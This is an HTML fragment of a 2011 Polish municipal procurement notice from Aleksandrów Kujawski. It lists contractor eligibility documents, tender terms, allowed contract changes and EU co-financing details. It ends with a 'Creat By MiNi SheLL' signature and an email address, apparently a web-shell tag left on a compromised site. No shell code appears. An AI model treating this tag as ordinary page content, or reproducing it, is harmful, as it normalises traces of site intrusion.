<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w następującym zakresie:
a) aktualizację danych Wykonawcy i Zamawiającego poprzez: zmianę nazwy firmy, zmianę adresu siedziby, zmianę formy prawnej itp.,
b) termin realizacji może ulec przesunięciu o czas opóźnienia w realizacji umowy wynikły wskutek siły wyższej uniemożliwiającej rozpoczęcie bądź kontynuowanie robót, lub przerw w realizacji robót powstałych z przyczyn zależnych od Zamawiającego.
c) zmniejszenie zakresu przedmiotu zamówienia oraz związane z tym zmniejszenie wartości umowy,
d) wykonanie robót zamiennych, zgodnie z procedurami i wymogami zawartymi w przepisie art. 36a ustawy Prawo budowlane.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.aleksandrowkujawski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, ul. Słowackiego 8, 87-700 Aleksandrów Kujawski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.11.2011 godzina 10:00, miejsce: Urząd Miejski, ul. Słowackiego 8, 87-700 Aleksandrów Kujawski.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany ze środków Regionalnego Programu Operacyjnego Województwa Kujawsko-Pomorskiego na lata 2007-2013
Oś priorytetowa 7. Wspieranie przemian w miastach i w obszarach wymagających odnowy. Działanie 7.1 Rewitalizacja zdegradowanych dzielnic miast.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com